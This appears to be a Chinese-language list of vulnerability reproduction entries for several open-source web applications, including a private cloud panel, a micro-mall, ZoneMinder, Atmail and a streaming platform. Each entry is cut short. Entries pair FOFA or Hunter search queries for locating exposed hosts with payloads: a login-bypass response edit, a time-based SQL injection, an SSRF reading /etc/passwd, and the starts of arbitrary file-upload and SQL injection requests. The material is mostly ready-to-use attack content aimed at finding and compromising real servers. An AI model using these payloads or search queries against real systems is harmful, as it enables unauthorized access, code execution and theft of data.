K38-1开源-私有云管理后台-PermissionAC 漏洞描述: 私有云管理平台存在登录绕过漏洞 Hunter语法: web.title=“私有云管理后台” 漏洞复现: 登陆界面抓包改返回响应的数据 payload: {"code":1000,"msg":"BscDYP2u0qLelgSB6XT
K37-2开源-微商城系统-任意文件上传 漏洞描述: 微商城系统 api.php 接口处存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。 fofa语法: body=“/Mao_Public/js/jquery-2.
K37-1开源-微商城系统-SQL 漏洞描述: 微商城系统 goods.php 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 fof
K36-2开源-智能停车管理系统-SQL 漏洞描述: 停车场后台管理系统 GetPasswayData 存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务
K35-1开源-Webuserlogin-RCE fofa语法: FOFA语法:body=“/upload/images/raisecom/back.gif” && title==“Web user login” 漏洞复现: payload: GET /vpn/list_base_config.ph
K34-1开源-ZoneMinder-SQL 漏洞复现: payload: /zm/index.php?sort=**if(now()=sysdate()%2Csleep(6)%2C0)**&order=desc&limit=20&view=request&request=watch&mid=1
K32-2开源-短视频直播打赏系统-任意文件上传 漏洞复现: payload: POST /admin/ajax/upload HTTP/1.1 Host: Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqVHC
K32-1开源-短视频直播打赏系统-SSRF 漏洞复现: payload: GET /caiji/get_curl?url=file:///etc/passwd HTTP/1.1 Host: Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1
K31-1开源-Atmail-SQL 漏洞复现: payload: POST /index.php/admin/index/login HTTP/1.1 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttp
K30-1开源-IP网络广播服务平台-任意文件上传 漏洞复现: payload: POST /api/v2/remote-upgrade/upload HTTP/1.1 Host: Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Wind